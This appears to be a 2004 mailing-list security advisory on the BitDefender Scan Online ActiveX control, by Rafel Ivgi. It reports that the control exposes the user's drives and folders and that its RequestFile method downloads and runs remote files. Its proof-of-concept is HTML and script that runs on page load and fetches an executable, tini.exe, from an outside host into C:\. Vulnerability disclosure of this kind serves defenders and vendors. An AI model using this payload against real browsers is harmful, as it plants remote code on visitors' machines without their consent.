<<< Date Index >>>     <<< Thread Index >>>

BitDefender Scan Online(ActiveX) - Remote File Download & Execute & Private Information Disclosure



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:  BitDefender Scan Online(ActiveX)
Vendors:        http://www.bitdefender.com/scan/Msie/index.php
Platforms:      Windows
Bug:                Remote File Download & Execute & Private Information
Disclosure
Risk:                High - Running Arbitary Code
Exploitation:   Remote with browser
Date:               19 Apr 2004
Author:           Rafel Ivgi, The-Insider
e-mail:             the_insider@xxxxxxxx
web:                http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

This is a quote of BitDefender Scan Online Description:
"BitDefender Scan Online is a fully functional antivirus product, with a
web-based interface and featuring all required elements for remotely
antivirus scanning and cleaning: it scans system's memory, all files,
folders and drives' boot sector, providing the user with the option to
automatically clean the infected files.

This is a quote of the page title:
"BitDefender AntiVirus - Data Security, AntiVirus Software, Free
Protection".
The meaning of this sentence is very far from reality.
I believe this to be a ridiculous that an AntiVirus will deliver and execute
a virus on my system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

"BitDefender Scan Online" downloads its components and registered
the following COM/ActiveX Object:

"AVXSCANONLINE.AvxScanOnlineCtrl.1"
With the following CLSID:
80DD2229-B8E4-4C77-B72F-F22972D723EA

"BitDefender Scan Online" has confusing protection, all properties and
functions cannot be set/accessed by the :

object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")

It can only be set/accessed using(html object tag created object):

"<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>"
----------------------------------------------------------------------------
--------------------------------------------------

"BitDefender Scan Online" Disclosures the users information, allowing a
remote user to see
all drives and folders of the system using this simple code:

------------------- CUT HERE -------------------
<OBJECT id=seemycomputer
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
------------------- CUT HERE -------------------

----------------------------------------------------------------------------
--------------------------------------------------

"BitDefender Scan Online" contains a function that will

***DOWNLOAD A REMOTE FILE AND WILL EXECUTE IT ON THE SYSTEM***

For Example:
object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\";);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept Code:
------------------- CUT HERE -------------------
<OBJECT id=mymy
codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,
1
hspace=0 vspace=0 align="top"
classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA
width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></object>
<script>
var a;

function cool() {
mymy.Update();
mymy.Updating(1);
mymy.SetCountry("Israel");
mymy.EnableRtvr(1);
mymy.SetupMode = true;
mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\";);
}

 setTimeout("cool()", 1500);
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible , Can do the Impossible."